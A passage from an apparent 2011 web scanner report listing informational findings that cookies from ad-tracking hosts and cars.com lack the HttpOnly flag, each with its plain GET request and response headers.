BK-Server: bbc9
Content-Length: 0
Content-Type: text/html


14.136. http://tags.bluekai.com/site/450

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/450

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/450 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99saNUAf9465B; bkou=KJye999999W=; bko=KJ0E8VBQYaGE8X4Y/9kk1EW99YDs9b6=; bkw5=KJypLs/9QAX1JT9A1TMJy1MyMS44CJcO0hRCyTQi/tucAsaYAUspOfWdxzVxjz05zzZ6OKsu9xe3rHUE; bk=Y0OrmpqbInUze1lp; bkc=KJ0EWZHQt1FchsOpwLbwARsOxxgW86UkuXQhGwOMVOeXqpy1ee5kZOiYNieTOhyjD4iq64M2J3MX603G415mOCxI0eTR78mnQVcw59Ssoa/Wdt9pv+I+9jDwGZcXNDeI8LtG4m+VPef/FAxGcyO2+pD+

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:42:32 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4e62c978; expires=Tue, 06-Sep-2011 00:42:32 GMT; path=/; domain=.bluekai.com
Set-Cookie: bk=tdEhIeqbInUze1lp; expires=Fri, 02-Mar-2012 00:42:32 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJyfh1M9LabvQScijJ/4A1kyYWiLxIwcLYeTDG/1ecF8ZOCLpLzCIn0G49A8OCxIueI1dTtcQKsZeOBe6OGWdT9M/yod1h3dlyuP4NGakKdR0ReYO2AcTlB01EeLZzf9AauvTO2LHrVfBSe0xEu1Fhg/lfyjkVd5iLGctjz/8x19tyLdwx==; expires=Fri, 02-Mar-2012 00:42:32 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Mon, 05-Sep-2011 00:42:32 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Mon, 05 Sep 2011 00:42:32 GMT
Cache-Control: max-age=86400, private
BK-Server: a094
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

14.137. http://tags.bluekai.com/site/4592

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/4592

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site/4592 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99saNUAf9465B; bkou=KJye999999W=; bko=KJ0E8VBQYaGE8X4Y/9kk1EW99YDs9b6=; bkw5=KJypLs/9QAX1JT9A1TMJy1MyMS44CJcO0hRCyTQi/tucAsaYAUspOfWdxzVxjz05zzZ6OKsu9xe3rHUE; bklc=4e62c9df; bk=aBD3cMqbInUze1lp; bkc=KJ0qyLl9y1qO0cedjJ/4/y1eyhxQU2Kx9RD4yTnQ3yshUu6eyhTQ7y7veIBY8RKiXDcbR4hexWwVupWyPWeB9dcUG4aObZaXvDWsCgNXE9yt8I1x4a8DFGxz9yG4oOdsdXqeycOECGACS9tY4XYHWRVdsRl4qTnvwbtY074LjWeCQI0eXEkO4odmyJODir94qWqkrpVQXAW6MnXS0BIXsjPFlRgvO2ZUYmDe9WY6PW9=; bkst=KJhMRjMYpzYQym9UAJTqPa3RqJCr7Zd3ZKL4RmGHajZUkN/RbZBoks4G5F2AACX9O76Byy==; bkdc=sf

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:44:50 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4e62ca02; expires=Tue, 06-Sep-2011 00:44:50 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Mon, 05 Sep 2011 00:44:50 GMT
Cache-Control: max-age=86400, private
BK-Server: f778
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

14.138. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /oz/feeds/invite-media-rtb/tokens/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/feeds/invite-media-rtb/tokens/ HTTP/1.1
Host: tap.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 01:24:33 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Location: http://pixel.rubiconproject.com/tap.php?v=5852&nid=2101&put=
Content-Length: 0
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Mon, 03-Sep-2012 01:24:33 GMT; Path=/
Set-Cookie: dq=2|2|0|0; Expires=Mon, 03-Sep-2012 01:24:33 GMT; Path=/
Set-Cookie: lm="4 Sep 2011 01:24:33 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close
Content-Type: text/plain; charset=UTF-8


14.139. http://tu.connect.wunderloop.net/TU/1/1/1/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tu.connect.wunderloop.net
Path:   /TU/1/1/1/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TU/1/1/1/ HTTP/1.1
Host: tu.connect.wunderloop.net
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:50 GMT
Server: Apache
P3P: policyref="http://connect.wunderloop.net/w3c/p3p.xml", CP="NOI PSAa PSDa OUR IND UNI CNT"
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 31 Oct 1989 14:06:29 GMT
Last-Modified: Thu, 31 Oct 1989 14:06:29 GMT
Set-Cookie: wlid=id%3Aa_6f76e8d5cf024e8471d7df3851e5a9fc%3A; expires=Wed, 29-Aug-2012 00:54:50 GMT; domain=.wunderloop.net; Path=/
X-Cnection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

14.140. http://tu.connect.wunderloop.net/TU2/1/1/1/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tu.connect.wunderloop.net
Path:   /TU2/1/1/1/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TU2/1/1/1/ HTTP/1.1
Host: tu.connect.wunderloop.net
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wlid=id%3Aa_6f76e8d5cf024e8471d7df3851e5a9fc%3A

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:43:57 GMT
Server: Apache
P3P: policyref="http://connect.wunderloop.net/w3c/p3p.xml", CP="NOI PSAa PSDa OUR IND UNI CNT"
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 31 Oct 1989 14:06:29 GMT
Last-Modified: Thu, 31 Oct 1989 14:06:29 GMT
Set-Cookie: wlid=id%3Aa_6f76e8d5cf024e8471d7df3851e5a9fc%3A; expires=Wed, 29-Aug-2012 00:43:57 GMT; domain=.wunderloop.net; Path=/
X-Cnection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

14.141. http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s88160667486954

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usatoday1.112.2o7.net
Path:   /b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s88160667486954

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s88160667486954 HTTP/1.1
Host: usatoday1.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 01:25:07 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_yx7Fmxxchmux7Cx7Ech=[CS]v4|0-0|4E62D373[CE]; Expires=Fri, 2 Sep 2016 01:25:07 GMT; Domain=.2o7.net; Path=/
Location: http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s88160667486954?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Sat, 03 Sep 2011 01:25:07 GMT
Last-Modified: Mon, 05 Sep 2011 01:25:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www618
Content-Length: 0
Content-Type: text/plain
Connection: close


14.142. http://www.bizographics.com/collect/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /collect/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /collect/?fmt=gif&url=reuters.com&pid=501 HTTP/1.1
Host: www.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Content-Language: en-US
Date: Sun, 04 Sep 2011 00:45:19 GMT
Location: http://img.bizographics.com/1x1.gif
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4; Domain=.bizographics.com; Expires=Sun, 04-Mar-2012 12:45:19 GMT; Path=/
Set-Cookie: BizoData=Pp1FHRK43ZwxEqHtFj4aisdQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KQ6is7u1bQQY8aj5XcunNcMDa7Re6IGD4lOeTENrYq3ZvAd6xyMUDLG6hh7sErqHyaoEyKUrunjtqgDfn74jNwcPJZXKAa9DdLgeLHSyEVCqewehdQ95muedOoesP2U0B4uSKJipWuwJodXwOG6Ckz6TNNGdaF6nEbrp2RisySjMfspDrisu7VtBBjxqPldy6c1wwH4DELwm2ipwNthjuRJX8ipa7TbwiiAhQOisLScEBcVisgQgNPyXdljTHnfyBp1sJ7Vvkc46t01cWfT12ipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6nc4wINO1L7830xNl7tETxisz59RGoQec9up8HFkflmyEwieie; Domain=.bizographics.com; Expires=Sun, 04-Mar-2012 12:45:19 GMT; Path=/
Content-Length: 0
Connection: keep-alive


14.143. http://www.careerbuilder.com/Jobseeker/Jobs/JobResults.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /Jobseeker/Jobs/JobResults.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Jobseeker/Jobs/JobResults.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 182682
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR29
Date: Sun, 04 Sep 2011 01:25:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...

14.144. http://www.cars.com/go/advice/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cars.com
Path:   /go/advice/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/advice/index.jsp HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:25:13 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:55:29 GMT; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 45669

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>


<meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...

14.145. http://www.cars.com/go/advice/shopping/cpo/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cars.com
Path:   /go/advice/shopping/cpo/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: cars_persist. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/advice/shopping/cpo/index.jsp HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:25:13 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
Content-Length: 28814
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:55:29 GMT; path=/
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<script type="text/javascript" src="/js/lib/jquery/1_3_2/jquery.min.js"></s
...[SNIP]...

14.146. http://www.cars.com/go/kbb/kbbInput.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cars.com
Path:   /go/kbb/kbbInput.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: cars_persist. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/kbb/kbbInput.jsp HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:25:20 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
Content-Length: 18484
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:55:37 GMT; path=/
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...

14.147. http://www.cars.com/go/photogalleries/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cars.com
Path:   /go/photogalleries/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: cars_persist. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/photogalleries/index.jsp HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:25:17 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:55:34 GMT; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 35059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>


   <title>Car Phot
...[SNIP]...

14.148. http://www.cars.com/go/search/advanced_search.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cars.com
Path:   /go/search/advanced_search.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: cars_persist. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/search/advanced_search.jsp HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 04 Sep 2011 01:25:20 GMT
Server: IBM_HTTP_Server
Location: http://www.cars.com/for-sale/advancedsearch.action
Content-Length: 331
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:55:37 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.cars.com/for
...[SNIP]...

14.149. http://www.cars.com/images/bttncapOrngR.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cars.com
Path:   /images/bttncapOrngR.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: cars_persist. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bttncapOrngR.gif HTTP/1.1
Host: www.cars.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cars_persist=3963688108.20480.0000

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:44:44 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 11 Sep 2003 03:21:42 GMT
ETag: "547bf-14a-4c7a9d80"
Accept-Ranges: bytes
Content-Length: 330
Cache-Control: max-age=31536000
Expires: Mon, 03 Sep 2012 00:44:44 GMT
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Content-Type: image/gif
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:15:00 GMT; path=/

GIF89a [binary GIF body not shown]
...[SNIP]...

14.150. http://www.cars.com/images/long_back_orng.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cars.com
Path:   /images/long_back_orng.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: cars_persist. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/long_back_orng.gif HTTP/1.1
Host: www.cars.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cars_persist=3963688108.20480.0000

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:44:44 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 23 Oct 2003 21:49:52 GMT
ETag: "54d8d-24c-aced4000"
Accept-Ranges: bytes
Content-Length: 588
Cache-Control: max-age=31536000
Expires: Mon, 03 Sep 2012 00:44:44 GMT
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Content-Type: image/gif
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:15:00 GMT; path=/

GIF89a [binary GIF body not shown]
...[SNIP]...

14.151. http://www.cars.com/includes/js/makemodels-used.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cars.com
Path:   /includes/js/makemodels-used.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: cars_persist. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/js/makemodels-used.js HTTP/1.1
Host: www.cars.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:43:43 GMT
Server: IBM_HTTP_Server
Last-Modified: Sat, 03 Sep 2011 16:46:10 GMT
ETag: "55fa6-45e9-370c9880"
Accept-Ranges: bytes
Content-Length: 17897
Cache-Control: max-age=7200
Expires: Sun, 04 Sep 2011 02:43:43 GMT
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Content-Type: application/x-javascript
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:14:00 GMT; path=/
Vary: Accept-Encoding, User-Agent
Connection: Keep-Alive

function initCars() { K(1,"Acura");D(1,"CL");D(1,"Integra");D(1,"Legend");D(1,"MDX");D(1,"NSX");D(1,"RDX");D(1,"RL");D(1,"RSX");
D(1,"SLX");D(1,"TL");D(1,"TSX");D(1,"Vigor");D(1,"ZDX");K(2,"Alfa Romeo
...[SNIP]...

14.152. http://www.cars.com/includes/js/used-car-widget_driver.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cars.com
Path:   /includes/js/used-car-widget_driver.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: cars_persist. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/js/used-car-widget_driver.js HTTP/1.1
Host: www.cars.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:43:43 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 26 Jan 2011 16:26:35 GMT
ETag: "55619-152a-4bed04c0"
Accept-Ranges: bytes
Content-Length: 5418
Cache-Control: max-age=7200
Expires: Sun, 04 Sep 2011 02:43:43 GMT
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Content-Type: application/x-javascript
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:14:00 GMT; path=/
Vary: Accept-Encoding, User-Agent
Connection: Keep-Alive

// window.onerror=processError;

// variables used to change selection when "===" selected
var nModelPrevSelected = new Number(0);
var nMakePrevSelected = new Number(0);

var makes
...[SNIP]...

14.153. http://www.cars.com/test/widget/Custom/carslogo71x34.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cars.com
Path:   /test/widget/Custom/carslogo71x34.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: cars_persist. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /test/widget/Custom/carslogo71x34.jpg HTTP/1.1
Host: www.cars.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cars_persist=3963688108.20480.0000

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:43:50 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 19 Feb 2009 15:30:07 GMT
ETag: "4655b-3454-36057dc0"
Accept-Ranges: bytes
Content-Length: 13396
Cache-Control: max-age=31536000
Expires: Mon, 03 Sep 2012 00:43:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Content-Type: image/jpeg
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:14:07 GMT; path=/

JFIF/Exif header [binary JPEG body not shown; the Exif block names the producing software as Adobe Photoshop CS3 Windows, 2009:01:30 16:29:40]
...[SNIP]...

14.154. http://www.myspace.com/Modules/PostTo/Pages/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myspace.com
Path:   /Modules/PostTo/Pages/

Issue detail

